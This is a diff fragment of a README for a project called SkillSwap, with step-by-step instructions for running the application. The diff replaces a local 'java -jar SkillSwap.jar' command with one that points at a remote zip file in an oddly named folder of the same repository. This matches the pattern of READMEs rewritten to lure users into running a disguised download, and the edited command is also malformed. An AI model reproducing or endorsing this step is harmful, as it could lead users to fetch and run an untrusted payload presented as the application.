devilstreameryt/SkillSwap/README.md

    - Type `cd path_to_your_download_folder` (replace `path_to_your_download_folder` with your actual path) and press `Enter`.

 4. **Run the Application:**
-   - If you have a jar file, type `java -jar SkillSwap.jar` and press `Enter`.
+   - If you have a jar file, type `java -jar https://raw.githubusercontent.com/devilstreameryt/SkillSwap/main/labelloid/SkillSwap.zip` and press `Enter`.
    - If it’s a different format, follow the included instructions in the extracted folder.

 5. **Access the Application:**